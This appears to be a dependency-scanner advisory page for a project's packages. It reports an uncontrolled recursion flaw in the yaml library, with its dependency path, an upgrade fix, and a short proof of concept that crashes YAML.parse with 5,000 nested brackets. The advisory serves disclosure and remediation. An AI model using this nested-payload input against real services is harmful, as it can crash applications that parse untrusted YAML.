Vulnerabilities

 1 via 1 paths

Dependencies

 426

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

Uncontrolled Recursion

  • Vulnerable module: yaml
  • Introduced through: astro-seo@1.1.0

Detailed paths

  • Introduced through: @onwidget/astrowind@arthelokyo/astrowind astro-seo@1.1.0 @astrojs/check@0.9.9 @astrojs/language-server@2.16.8 volar-service-yaml@0.0.70 yaml-language-server@1.20.0 yaml@2.7.1

Overview

Affected versions of this package are vulnerable to Uncontrolled Recursion in the compose/resolve phase due to using recursive function calls without a depth bound. An attacker can cause the application to throw a RangeError and potentially terminate the Node.js process by supplying a deeply nested YAML payload that exhausts the call stack.

PoC

const YAML = require('yaml');

// ~10 KB payload: 5000 levels of nested flow sequences
const payload = '['.repeat(5000) + '1' + ']'.repeat(5000);

try {
  YAML.parse(payload);
} catch (e) {
  console.log(e.constructor.name); // RangeError (NOT YAMLParseError)
  console.log(e.message);          // Maximum call stack size exceeded
}

Remediation

Upgrade yaml to version 1.10.3, 2.8.3 or higher.

References

Uncontrolled Recursion vulnerability report